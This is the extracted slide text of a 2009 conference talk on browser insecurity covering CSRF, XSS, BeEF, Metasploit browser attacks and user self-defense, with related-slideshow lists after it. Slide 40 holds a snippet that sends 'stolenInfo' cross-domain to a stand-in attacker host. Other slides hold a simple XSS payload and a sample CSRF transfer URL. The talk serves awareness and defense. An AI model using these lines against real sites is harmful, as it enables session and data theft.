SlideShare une entreprise Scribd logo

Total Browser Pwnag3 V1.0 Public

Rafal Los
Rafal Los

From InfoSec World 2009, Josh Abraham (of Rapid7) and I did a talk on owning the browser and why it's completely a broken concept... if you loved the presentation here are the slides!

Technologie
1  sur  64
Total Browser Pwnag3 Joshua D. Abraham Rafal M. Los Security Expert Sr. Security Strategist 1 12 March 2009
Talk Overview 2 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
Disclaimer 3  We are trained professionals with over 15 years combined experience in these matters – it goes without saying – don‟t try this at home! If you attempt anything you see today you may be subject to any number of locally applicable laws resulting in fines or imprisonment.  Knowledge is power – please use it responsibly 12 March 2009
Talk Overview 4 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
WorldWideWeb Evolved 5  Where browsers started Remember gopher?  Text-based way to retrieve Internet-stored information  First web browser was “WorldWideWeb” (Feb. 26, 1991)  Sir Tim Berners-Lee   Capable of displaying style-sheets, and media supported by the NeXT system  First program to use HTTP (Hypertext Transfer Protocol) invented by Berners-Lee in 1989  HTTP was a leap forward and a move from text  graphical “browsing” Flurry of development activity culminated in Mosaic  Great history of the web on W3 (http://www.w3.org/History.html)  12 March 2009
WorldWideWeb Evolved 6 Taken from Wikipedia: http://en.wikipedia.org/wiki/Timeline_of_web_browsers 12 March 2009
WorldWideWeb Evolved 7  What happened along the way 2 main browser foundations  Lynx (text-based browser for the terminal)   Mosaic foundation for most modern browsers  Spawned Netscape  Mozilla branch  Spawned MS Internet Explorer branch  Several “boutique” browsers including…  OmniWeb, iCab, w3m, Tamaya, Opera Arachne Browsers all adhere [loosely] to the HTML-spec  Currently on version 5 DRAFT   http://dev.w3.org/html5/spec/Overview.html  Many “proprietary” technologies in browsers  Microsoft‟s ActiveX… only works in MSIE 12 March 2009
WorldWideWeb Evolved 8  Modern web browsers and content  Modern browsing Simple HTML has evolved into RIA   Synchronous to asynchronous browsing  Cross-platform support of media and content Aren‟t there Standards?  HTML standards aren‟t followed 100%   HTML-spec focused on features, not security The browser, over-extended  Browsers today are doing more than they were intended to   Features/functions are at odds with good security  … this creates a problem 12 March 2009
WorldWideWeb Evolved 9  Evolution of HTML Specification  Start: HTML v1 Very simple   Basic layout and rendering of static content Evolved: HTML v5 (draft)  Extremely complex   Rich user-experience  Supported embedded content, media and interactive elements Complexity is the enemy of security  More complex structures create possibility for exploitation   Functionality at the sacrifice of security Security is an afterthought…  12 March 2009
WorldWideWeb Evolved 10  Hacking a standard  (current) HTML-spec is flawed  Exploitation is possible  NO “fix” is available  ClickJacking… more than a theoretical attack…  DEMO 12 March 2009
Talk Overview 11 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
Square Browser, Round Hole 12  Delivering content of HTTP  HyperText Transfer Protocol  Current version HTTP/1.1, RFC 2616 (http://tools.ietf.org/html/rfc2616)  Published in June 1999  WikiPedia: http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol   Clearly outdated  Never really intended to be session-aware  Request/Response synchronous framework  Modern “browsers” use HTTP as an interactive protocol 12 March 2009
Square Browser, Round Hole 13  Several reasons browsers are over-extended  User-state tracking HTML-spec initially had no notion of “state”   Bolt-on as pages turned to applications Highly interactive “applications” (RIA, etc)  Browser meant to render static content   Browsers never meant to house applications Synchronous vs. Asynchronous requests  HTTP-spec built around client single request/response   Asynchronicity creates gaping security issues …and there are more  12 March 2009
Square Browser, Round Hole 14  Tracking state  State-management a browser “afterthought”  Browser not meant to handle persistent sessions with server  Goes against foundational principles of “browser” technology  User state tracked in various ways  Cookie Piece of persistent code stored on your computer  Parameter  Variable inside the browser session   In the URI, inside POST, or other method Client-side… so it can be manipulated, lost or stolen  …and then it gets complicated  12 March 2009
Square Browser, Round Hole 15  Highly interactive applications  Browser intended to render server response (pages)  Browser not intended for real-time interactivity with user  Functions to enable Rich Internet Applications (RIA) shoe- horned into the browser Microsoft‟s ActiveX, Silverlight   Java Applets (DEMO later)  Adobe Flash, AIR  AJAX frameworks  Browser plug-ins  Firefox add-ons (Keylogger DEMO)  MS IE BHOs (browser-helper objects) The Browser is too complex for its own good  12 March 2009
Square Browser, Round Hole 16  Java Applet Attack (“Single Click of Death”)  Self Signed  Execute code anywhere Windows  Linux  Mobile devices   OS Detection  ~DEMO~ 12 March 2009
Square Browser, Round Hole 17  Synchronous vs. Asynchronous requests  Browser spec built around user click (request)  response User requests page, server returns page and embedded objects  Functionality necessitated evolution  Full-page refresh on every mouse click/load was annoying to users   Methods for automating object loads (requests) created (AJAX)  Browser can now fetch requests on user‟s behalf…  …and without the user‟s knowledge Security issues arise  Differentiate between script & user requests…  Stop and think… script on a page can request other objects  Great for rich user experience   Scary for security 12 March 2009
Square Browser, Round Hole 18  Cookies  Session ID (Used to Authenticate the User)  Username  Password  Expiration (30 minutes)  Single session per login instance  Example:  User opens: https://www.gmail.com  Enters username  Enters complex password  Clicks login… 12 March 2009
Square Browser, Round Hole 19  … And the Session ID is transferred securely right??  Maybe not… 12 March 2009
Square Browser, Round Hole 20  Session Management  Setting Session IDs within Cookies  Session IDs Sufficient randomness   http://en.wikipedia.org/wiki/FIPS_140-2  Attacks  CSRF  HTTP capture  Surfjack  Session Testing 12 March 2009
Square Browser, Round Hole 21  Cross Site Request Forgery (CSRF)  User is logged into bank  Bank website is vulnerable to CSRF  Attacker send user malicious link  User clicks the click and the attacker now is $5000 richer  Examples:  https://bank.com/transfer?amount=5000&toaccount=123 12 March 2009
Talk Overview 22 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
Pwnag3 – Owning Your Victim 23 Cross-Site Scripting (XSS) Exploit Standards Exploit Exploit Browsers Plugins 12 March 2009
Pwnag3 – Owning Your Victim 24  What is Cross Site Scripting?  What are the Types?  DOM-Based  Reflective  Persistent  How do you find XSS?  http://ha.ckers.org/xss.html 12 March 2009
Pwnag3 – Owning Your Victim 25  Storage of Malicious JavaScript in the database Example: Administrative Log Page  Reads username from DB for a failed login attempt   Write the result to the an administrative log …  What if we enter:  <script>alert(„XSS‟)</script> as the username???  Input from the DB written to the page 12 March 2009
Pwnag3 – Owning Your Victim 26 Attacker inserts Javascript • Ex: document.write(„<script>alert(„XSS‟)</script>‟); Browser writes the Javascript to the DOM Javascript is rendered Client Pwn3d 12 March 2009
Pwnag3 – Owning Your Victim 27  Ability to perform Client Base attacks  Communication making Exploitation easier Twitter Text Email Message AIM Pwnag3 Facebook 12 March 2009
Pwnag3 – Owning Your Victim 28  Attackers have choice!!! Your Your customer‟s Website Website Websites Partner‟s you trust Website 12 March 2009
Pwnag3 – Owning Your Victim 29 Steal cookies Redirect to other malicious Key logging content (webpage, exe, pdf etc) XSS Attack vectors Internal Port Steal clipboard scanning Browser Appearance of exploits website defacement (MoBB) 12 March 2009
Pwnag3 – Owning Your Victim 30 12 March 2009
Pwnag3 – Owning Your Victim 31 Issues Not Fixed Properly  Known Open Redirects Google.com since 2006!  Other sites Yahoo.com, Ask.com, Lycos.com …   Known Instances of XSS  Search Engine for issues (xssed.com)  American Express Not fixed until it is fixed   Theregister.co.uk Social Networking sites  Potential for worms   Everyone remember sammy? 12 March 2009
Pwnag3 – Owning Your Victim 32  Browser Exploit Framework (BeEF)  Attacking many clients at once  Stores the results in log files  Ability to add multiple attack vectors  Open Source  Included in BackTrack LiveCD (http://remote-exploit.org)  http://www.bindshell.net/tools/beef/  DEMO 12 March 2009
Pwnag3 – Owning Your Victim 33  Metasploit Exploit Framework  Exploits => 305  Payloads => 170  Encoders => 20  Auxiliary modules => 67 12 March 2009
Pwnag3 – Owning Your Victim 34 MetaSploit Browser Attacks  Browser Autopwn Flaws in IE  Flaws in Firefox   Malicious Files  Office Documents (doc,xls,ppt)  And PDFs (Adobe browser plugin DEMO)  HTTP / HTTPS capture 12 March 2009
Pwnag3 – Owning Your Victim 35  IE XML Corruption Exploit  0day on milw0rm Not reliable  Single OS, single payload  Modifying the payload (manual)   MSFv3 module soon thereafter  Reliable  Multiple payloads  Modifying the payload (easy)  ~DEMO~ 12 March 2009
Talk Overview 36 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
Searching for Hope 37  Can a web browser be made “secure”?  Can security vulnerabilities be eliminated?  Can standards issues be mitigated?  What are the trade-offs?  More security = less features  Less complexity = more security  Both are contrary to current builds of modern browsers  Try your browser with all plug-ins, scripting, active content, disabled… Welcome back to 1996!  12 March 2009
Searching for Hope 38  Brower +  First, define the role of the browser All-in-one render engine?   Plug-in manager? Natively browsers need to render simple content  Standards-based HTML, DHTML, etc   About those plug-ins  Toolbars  BHO (for IE)  Add-ins (for Firefox) 12 March 2009
Searching for Hope 39  Internet Explorer 8.0+  Advancements: Internal anti-Cross-Site Scripting (XSS)   Natively attempt to break Type-1 (reflected) attacks  Browser-based “neutering” for XSS prevention Content-sniffing opt-out   Forces browser not to interpret content  URL Highlighting  Base URL is highlighted for user safety/clarity 12 March 2009
Searching for Hope 40  Internet Explorer 8.0+  Setbacks Cross-Domain Requests (XDR Object)   Allows Scripts simple way to pass data; effectively breaking same-origin policy XDR Object simplifies cross-domain requests  • var xdr = new XDomainRequest(); xdr.open(quot;POSTquot;, quot;http://www.bad guy.com/quot;); xdr.send(stolenInfo); 12 March 2009
Searching for Hope 41  FireFox 3+  Advancements Anti-Phishing/Malware   Full-page browser warning (through Google Safe-Browsing API)  Anti-Phishing updates 48 times/day  Focused on security  Mozilla‟s goal: bolster security in FireFox  Automatic update  Automatically get latest browser updates for maximum security  Pop-up blocker  Block pop-ups with customizable options 12 March 2009
Searching for Hope 42  FireFox 3+  Drawbacks Currently leading in disclosed vulnerabilities  … but so far that‟s it.  12 March 2009
Searching for Hope 43  Securing HTML-spec? (v5)  Functionality vs. Security Functionality requires complexity   Complexity often causes security issues  Living with exploitable functionality More “exploitable functionality” will be uncovered  HTML v5 is too complex not to have faults   AJAX frameworks continue to add functions/methods  Can increased functionality (RIA) co-exist with the need for security? 12 March 2009
Searching for Hope 44  Developer Tools  Helping Enabling faster development of pages and applications   Allowing non-experts to create pages and applications Hurting  More “point and click” development   A single broken development tool accounts for mass breakage  Developers many not understand complexities of what they are doing  Heavy reliance on tools to “do security for you” 12 March 2009
Searching for Hope 45  Building a secure browser  What is considered “secure”?  What would need to be sacrificed?  Is it feasible?  A “secure” browser checklist  NoScript-type functionality  Native & effective pop-up blockers  Sessions destroyer(s)  True SSL validation  All features have to be user-friendly 12 March 2009
Searching for Hope 46  The secure browser challenge  Even if the browser is 100% bug-free… The spec is broken   Add-ons are exploitable  Malicious add-ons abound  “toolbars”  “plug-ins”  Developers still write buggy code  The standards are too complex to implement 12 March 2009
Searching for Hope 47  Is there any hope?  Maybe… Start by fixing the HTML standards   Educate users not to install unknown plug-ins  Educate developers to write better applications/sites  Think twice before adding functionality to your browser Maybe not…  The browser was never meant to do what it does today   Perhaps it‟s time for a revolution… a new tool or ?  Since day 1 we‟ve gotten it wrong consistently  Millions of you have your browsers “infected” or trojaned 12 March 2009
Talk Overview 48 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
Self-Defense 101 49  Protecting yourself in “cyberspace”  Know who/what to trust Trust no one (or no site)   Some sites are more trustworthy than others <ahem>  Always be weary of “free” widgets they come with a price  No site deserves your unverified trust  Remember *any* site can be compromised (and likely will) 12 March 2009
Self-Defense 101 50  Know where to click  Always (ALT+F4) on pop-up windows Malicious people can change window appearance and behavior of  buttons… never trust buttons! Check link target when you mouse-over a link  Never fall for “scare-tactics”  “Your computer is infected, click here  to install remover utility”  ~100% of those pop-ups are malware Never click links in emails  Even from people you think you trust… you never know  12 March 2009
Self-Defense 101 51  Know which browser to use  FireFox vs. Internet Explorer FireFox is currently “more secure by design”   Many exploits/attacks written for Internet Explorer  NoScript plug-in for FireFox greatly increases security  Internet Explorer utilizes ActiveX (an old, buggy technology) When Internet Explorer is the only option…  Use it in limited capacity   Navigate only to trusted sites NO browser is 100% safe to use  Overall, FireFox has proven to be more natively secure  12 March 2009
Self-Defense 101 52  Always keep yourself up-to-date  Internet Explorer Utilize Microsoft‟s auto-update feature   Visit update.microsoft.com regularly FireFox  Auto-updates (close it out regularly)   Answer YES when asked to update! Pay attention to tech news if you can…  Valuable information on where browser problems exist  12 March 2009
Self-Defense 101 53 Use good add-ons  NoScript   FireFox plug-in  Usable security against script-based attacks  Native protection against ClickJacking, other attacks  Requires user intervention and intelligence  CSRF Protector (helps protect against Clickjacking too)  http://www.cs.princeton.edu/~wzeller/csrf/protector/  Others  Many other plug-ins exist • Mostly for FireFox 12 March 2009
Self-Defense 101 54 Use a sandbox  Virtual machine for high-security   Build a VMWare throw-away image  No matter how infected, it will always return to safe  Sandbox your browser?  Sandboxie  ForceField from Zone Labs • Run your browser in a “jail” so it can‟t modify your PC • Remove your browser‟s ability to do damage to your PC 12 March 2009
Self-Defense 101 55 Stay alert  Always make sure you know what you‟re clicking no   If you don‟t trust it, don‟t click it  Never click links in emails  Remember: nothing is really free  Watch your mouse pointer…  If it turns to an hour-glass for no reason after you visit a site, that my be a sign of something malicious going on  Check SSL certificates  Don‟t just blindly click through error messages 12 March 2009
Talk Overview 56 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
Crystal Ball 57  What‟s next in web-browser hacking?  Exposing more broken standards  Exploiting browser compatibility issues  … what else? 12 March 2009
Crystal Ball 58 Exploit Standards Exploit Plugins Exploit Browsers Cross-Site Scripting (XSS) 12 March 2009
Crystal Ball 59  Browser with no add-ons  Browser with security built-in  NoScript  Pop-up blockers  SSL validation  Session destroyers  Browse monitor  All JavaScript calls  All requests  IPS for the browser 12 March 2009
Crystal Ball 60 Exploiting Standards…  Around the industry CA root server MD5SUM collision  Kaminky's DNS vulnerability  RSnake's Clickjacking   Why Hack? Exploit a Standard  Browsers don‟t check for “malice”  Exploiting standards = impossible to “patch”  Good luck writing a signatures  Only fix is rewrite standards… And… remove features?  12 March 2009
Crystal Ball 61 Can we make a secure Browser??? 12 March 2009
References 62  Pg 28 – IE8  http://blogs.msdn.com/ie/archive/2008/09/02/ie8-security- part-vi-beta-2-update.aspx  Pg 29 – IE8  http://securitylabs.websense.com/content/Blogs/2932.aspx  Pg 42 – Sandboxie  http://www.sandboxie.com/  Pg 42 – ForceField  http://www.zonealarm.com/security/en-us/home.htm 12 March 2009
How To Find Us 63 12 March 2009
Questions? 64 12 March 2009

Recommandé

Bruce lawson-over-the-air
Bruce lawson-over-the-airBruce lawson-over-the-air
Bruce lawson-over-the-airbrucelawson
 
Bruce Lawson, Web Development 2.0, SparkUp! Poznan Poland
Bruce Lawson, Web Development 2.0, SparkUp! Poznan PolandBruce Lawson, Web Development 2.0, SparkUp! Poznan Poland
Bruce Lawson, Web Development 2.0, SparkUp! Poznan Polandbrucelawson
 
Now you see me... Adaptive Web Design and Development
Now you see me... Adaptive Web Design and DevelopmentNow you see me... Adaptive Web Design and Development
Now you see me... Adaptive Web Design and DevelopmentJonas Päckos
 
Mike Davies - Ajax And Accessibility
Mike Davies - Ajax And AccessibilityMike Davies - Ajax And Accessibility
Mike Davies - Ajax And AccessibilityChristian Heilmann
 
Web3.0 and mobility ......
Web3.0 and mobility ......Web3.0 and mobility ......
Web3.0 and mobility ......Mengis Raoul
 
Real-world CSS3
Real-world CSS3Real-world CSS3
Real-world CSS3Zoe Gillenwater
 
Improving Drupal's Page Loading Performance
Improving Drupal's Page Loading PerformanceImproving Drupal's Page Loading Performance
Improving Drupal's Page Loading PerformanceWim Leers
 
ISM APAC TechTalk - WebSockets Presentation
ISM APAC TechTalk - WebSockets PresentationISM APAC TechTalk - WebSockets Presentation
ISM APAC TechTalk - WebSockets PresentationDimuthu Nilanka
 

Recommandé

Bruce lawson-over-the-air
Bruce lawson-over-the-airBruce lawson-over-the-air
Bruce lawson-over-the-airbrucelawson
 
Bruce Lawson, Web Development 2.0, SparkUp! Poznan Poland
Bruce Lawson, Web Development 2.0, SparkUp! Poznan PolandBruce Lawson, Web Development 2.0, SparkUp! Poznan Poland
Bruce Lawson, Web Development 2.0, SparkUp! Poznan Polandbrucelawson
 
Now you see me... Adaptive Web Design and Development
Now you see me... Adaptive Web Design and DevelopmentNow you see me... Adaptive Web Design and Development
Now you see me... Adaptive Web Design and DevelopmentJonas Päckos
 
Mike Davies - Ajax And Accessibility
Mike Davies - Ajax And AccessibilityMike Davies - Ajax And Accessibility
Mike Davies - Ajax And AccessibilityChristian Heilmann
 
Web3.0 and mobility ......
Web3.0 and mobility ......Web3.0 and mobility ......
Web3.0 and mobility ......Mengis Raoul
 
Real-world CSS3
Real-world CSS3Real-world CSS3
Real-world CSS3Zoe Gillenwater
 
Improving Drupal's Page Loading Performance
Improving Drupal's Page Loading PerformanceImproving Drupal's Page Loading Performance
Improving Drupal's Page Loading PerformanceWim Leers
 
ISM APAC TechTalk - WebSockets Presentation
ISM APAC TechTalk - WebSockets PresentationISM APAC TechTalk - WebSockets Presentation
ISM APAC TechTalk - WebSockets PresentationDimuthu Nilanka
 
We4IT lcty 2013 - keynote - worst practices - the best of the worst
We4IT lcty 2013 - keynote - worst practices - the best of the worstWe4IT lcty 2013 - keynote - worst practices - the best of the worst
We4IT lcty 2013 - keynote - worst practices - the best of the worstWe4IT Group
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
WordPress Multisite Network Do’s & Don’ts
WordPress Multisite Network Do’s & Don’tsWordPress Multisite Network Do’s & Don’ts
WordPress Multisite Network Do’s & Don’tsTaylor McCaslin
 
[drupalday2017] - Speed-up your Drupal instance!
[drupalday2017] - Speed-up your Drupal instance![drupalday2017] - Speed-up your Drupal instance!
[drupalday2017] - Speed-up your Drupal instance!DrupalDay
 
HTML5, are we there yet?
HTML5, are we there yet?HTML5, are we there yet?
HTML5, are we there yet?Ovidiu Dimulescu
 
WordPress Multi-Network
WordPress Multi-NetworkWordPress Multi-Network
WordPress Multi-NetworkCurtiss Grymala
 
Introduction to WordPress Multisite
Introduction to WordPress MultisiteIntroduction to WordPress Multisite
Introduction to WordPress MultisiteCraig Taylor
 
Volume 2-issue-6-2077-2080
Volume 2-issue-6-2077-2080Volume 2-issue-6-2077-2080
Volume 2-issue-6-2077-2080Editor IJARCET
 
Sem 27 02 09 4
Sem 27 02 09 4Sem 27 02 09 4
Sem 27 02 09 4Olga92
 
Tu sitio de encuentro
Tu sitio de encuentroTu sitio de encuentro
Tu sitio de encuentroguest7b70bf
 
Leyla Presentation At Sogeti![1]
Leyla Presentation At Sogeti![1]Leyla Presentation At Sogeti![1]
Leyla Presentation At Sogeti![1]MissLeylaBond
 
Agm Slideshow 3.09
Agm Slideshow 3.09Agm Slideshow 3.09
Agm Slideshow 3.09JamesGeedy
 
580 584
580 584580 584
580 584Editor IJARCET
 
357 366
357 366357 366
357 366Editor IJARCET
 
Performance Improvements in Browsers
Performance Improvements in BrowsersPerformance Improvements in Browsers
Performance Improvements in Browsersjeresig
 
A Period of Transition
A Period of TransitionA Period of Transition
A Period of TransitionJens Grochtdreis
 
Siruna session at Drupalcon Paris 2009
Siruna session at Drupalcon Paris 2009Siruna session at Drupalcon Paris 2009
Siruna session at Drupalcon Paris 2009Tom Deryckere
 
Transforming the web into a real application platform
Transforming the web into a real application platformTransforming the web into a real application platform
Transforming the web into a real application platformMohanadarshan Vivekanandalingam
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
Chris Wilson @ FOWA Feb 07
Chris Wilson @ FOWA Feb 07Chris Wilson @ FOWA Feb 07
Chris Wilson @ FOWA Feb 07carsonsystems
 
PrairieDevCon 2014 - Web Doesn't Mean Slow
PrairieDevCon 2014 - Web Doesn't Mean SlowPrairieDevCon 2014 - Web Doesn't Mean Slow
PrairieDevCon 2014 - Web Doesn't Mean Slowdmethvin
 
Developing the MIT Mobile Web
Developing the MIT Mobile WebDeveloping the MIT Mobile Web
Developing the MIT Mobile Webshu beta
 

Contenu connexe

Tendances

We4IT lcty 2013 - keynote - worst practices - the best of the worst
We4IT lcty 2013 - keynote - worst practices - the best of the worstWe4IT lcty 2013 - keynote - worst practices - the best of the worst
We4IT lcty 2013 - keynote - worst practices - the best of the worstWe4IT Group
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningzulla
 
WordPress Multisite Network Do’s & Don’ts
WordPress Multisite Network Do’s & Don’tsWordPress Multisite Network Do’s & Don’ts
WordPress Multisite Network Do’s & Don’tsTaylor McCaslin
 
[drupalday2017] - Speed-up your Drupal instance!
[drupalday2017] - Speed-up your Drupal instance![drupalday2017] - Speed-up your Drupal instance!
[drupalday2017] - Speed-up your Drupal instance!DrupalDay
 
Introduction to WordPress Multisite
Introduction to WordPress MultisiteIntroduction to WordPress Multisite
Introduction to WordPress MultisiteCraig Taylor
 

Tendances (7)

We4IT lcty 2013 - keynote - worst practices - the best of the worst
We4IT lcty 2013 - keynote - worst practices - the best of the worstWe4IT lcty 2013 - keynote - worst practices - the best of the worst
We4IT lcty 2013 - keynote - worst practices - the best of the worst
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
WordPress Multisite Network Do’s & Don’ts
WordPress Multisite Network Do’s & Don’tsWordPress Multisite Network Do’s & Don’ts
WordPress Multisite Network Do’s & Don’ts
 
[drupalday2017] - Speed-up your Drupal instance!
[drupalday2017] - Speed-up your Drupal instance![drupalday2017] - Speed-up your Drupal instance!
[drupalday2017] - Speed-up your Drupal instance!
 
HTML5, are we there yet?
HTML5, are we there yet?HTML5, are we there yet?
HTML5, are we there yet?
 
WordPress Multi-Network
WordPress Multi-NetworkWordPress Multi-Network
WordPress Multi-Network
 
Introduction to WordPress Multisite
Introduction to WordPress MultisiteIntroduction to WordPress Multisite
Introduction to WordPress Multisite
 

En vedette

Volume 2-issue-6-2077-2080
Volume 2-issue-6-2077-2080Volume 2-issue-6-2077-2080
Volume 2-issue-6-2077-2080Editor IJARCET
 
Sem 27 02 09 4
Sem 27 02 09 4Sem 27 02 09 4
Sem 27 02 09 4Olga92
 
Tu sitio de encuentro
Tu sitio de encuentroTu sitio de encuentro
Tu sitio de encuentroguest7b70bf
 
Leyla Presentation At Sogeti![1]
Leyla Presentation At Sogeti![1]Leyla Presentation At Sogeti![1]
Leyla Presentation At Sogeti![1]MissLeylaBond
 
Agm Slideshow 3.09
Agm Slideshow 3.09Agm Slideshow 3.09
Agm Slideshow 3.09JamesGeedy
 

En vedette (7)

Volume 2-issue-6-2077-2080
Volume 2-issue-6-2077-2080Volume 2-issue-6-2077-2080
Volume 2-issue-6-2077-2080
 
Sem 27 02 09 4
Sem 27 02 09 4Sem 27 02 09 4
Sem 27 02 09 4
 
Tu sitio de encuentro
Tu sitio de encuentroTu sitio de encuentro
Tu sitio de encuentro
 
Leyla Presentation At Sogeti![1]
Leyla Presentation At Sogeti![1]Leyla Presentation At Sogeti![1]
Leyla Presentation At Sogeti![1]
 
Agm Slideshow 3.09
Agm Slideshow 3.09Agm Slideshow 3.09
Agm Slideshow 3.09
 
580 584
580 584580 584
580 584
 
357 366
357 366357 366
357 366
 

Similaire à Total Browser Pwnag3 V1.0 Public

Performance Improvements in Browsers
Performance Improvements in BrowsersPerformance Improvements in Browsers
Performance Improvements in Browsersjeresig
 
Siruna session at Drupalcon Paris 2009
Siruna session at Drupalcon Paris 2009Siruna session at Drupalcon Paris 2009
Siruna session at Drupalcon Paris 2009Tom Deryckere
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
Chris Wilson @ FOWA Feb 07
Chris Wilson @ FOWA Feb 07Chris Wilson @ FOWA Feb 07
Chris Wilson @ FOWA Feb 07carsonsystems
 
PrairieDevCon 2014 - Web Doesn't Mean Slow
PrairieDevCon 2014 - Web Doesn't Mean SlowPrairieDevCon 2014 - Web Doesn't Mean Slow
PrairieDevCon 2014 - Web Doesn't Mean Slowdmethvin
 
Developing the MIT Mobile Web
Developing the MIT Mobile WebDeveloping the MIT Mobile Web
Developing the MIT Mobile Webshu beta
 
Web browser and Security Threats
Web browser and Security ThreatsWeb browser and Security Threats
Web browser and Security ThreatsHTS Hosting
 
Creating A Web 2.0 Toolbox For The Academic Library
Creating A Web 2.0 Toolbox For The Academic LibraryCreating A Web 2.0 Toolbox For The Academic Library
Creating A Web 2.0 Toolbox For The Academic LibraryDarylyne Provost
 
State of jQuery - AspDotNetStorefront Conference
State of jQuery - AspDotNetStorefront ConferenceState of jQuery - AspDotNetStorefront Conference
State of jQuery - AspDotNetStorefront Conferencedmethvin
 
Building Responsive Websites and Apps with Drupal
Building Responsive Websites and Apps with DrupalBuilding Responsive Websites and Apps with Drupal
Building Responsive Websites and Apps with DrupalFour Kitchens
 
Mozilla Project and Open Web
Mozilla Project and Open WebMozilla Project and Open Web
Mozilla Project and Open WebChanny Yun
 
Bruce Lawson Opera Indonesia
Bruce Lawson Opera IndonesiaBruce Lawson Opera Indonesia
Bruce Lawson Opera Indonesiabrucelawson
 
Building Mobile Websites with Joomla
Building Mobile Websites with JoomlaBuilding Mobile Websites with Joomla
Building Mobile Websites with JoomlaTom Deryckere
 
Opera and the Open Web platform
Opera and the Open Web platformOpera and the Open Web platform
Opera and the Open Web platformAndreas Bovens
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
Drupalcamp New York 2009
Drupalcamp New York 2009Drupalcamp New York 2009
Drupalcamp New York 2009Tom Deryckere
 

Similaire à Total Browser Pwnag3 V1.0 Public (20)

Performance Improvements in Browsers
Performance Improvements in BrowsersPerformance Improvements in Browsers
Performance Improvements in Browsers
 
A Period of Transition
A Period of TransitionA Period of Transition
A Period of Transition
 
Siruna session at Drupalcon Paris 2009
Siruna session at Drupalcon Paris 2009Siruna session at Drupalcon Paris 2009
Siruna session at Drupalcon Paris 2009
 
Transforming the web into a real application platform
Transforming the web into a real application platformTransforming the web into a real application platform
Transforming the web into a real application platform
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
Chris Wilson @ FOWA Feb 07
Chris Wilson @ FOWA Feb 07Chris Wilson @ FOWA Feb 07
Chris Wilson @ FOWA Feb 07
 
PrairieDevCon 2014 - Web Doesn't Mean Slow
PrairieDevCon 2014 - Web Doesn't Mean SlowPrairieDevCon 2014 - Web Doesn't Mean Slow
PrairieDevCon 2014 - Web Doesn't Mean Slow
 
Developing the MIT Mobile Web
Developing the MIT Mobile WebDeveloping the MIT Mobile Web
Developing the MIT Mobile Web
 
Web browser and Security Threats
Web browser and Security ThreatsWeb browser and Security Threats
Web browser and Security Threats
 
Creating A Web 2.0 Toolbox For The Academic Library
Creating A Web 2.0 Toolbox For The Academic LibraryCreating A Web 2.0 Toolbox For The Academic Library
Creating A Web 2.0 Toolbox For The Academic Library
 
State of jQuery - AspDotNetStorefront Conference
State of jQuery - AspDotNetStorefront ConferenceState of jQuery - AspDotNetStorefront Conference
State of jQuery - AspDotNetStorefront Conference
 
Building Responsive Websites and Apps with Drupal
Building Responsive Websites and Apps with DrupalBuilding Responsive Websites and Apps with Drupal
Building Responsive Websites and Apps with Drupal
 
Mozilla Project and Open Web
Mozilla Project and Open WebMozilla Project and Open Web
Mozilla Project and Open Web
 
Bruce Lawson Opera Indonesia
Bruce Lawson Opera IndonesiaBruce Lawson Opera Indonesia
Bruce Lawson Opera Indonesia
 
Webdevelopment
WebdevelopmentWebdevelopment
Webdevelopment
 
Building Mobile Websites with Joomla
Building Mobile Websites with JoomlaBuilding Mobile Websites with Joomla
Building Mobile Websites with Joomla
 
Opera and the Open Web platform
Opera and the Open Web platformOpera and the Open Web platform
Opera and the Open Web platform
 
Web Performance Optimization
Web Performance OptimizationWeb Performance Optimization
Web Performance Optimization
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
Drupalcamp New York 2009
Drupalcamp New York 2009Drupalcamp New York 2009
Drupalcamp New York 2009
 

Plus de Rafal Los

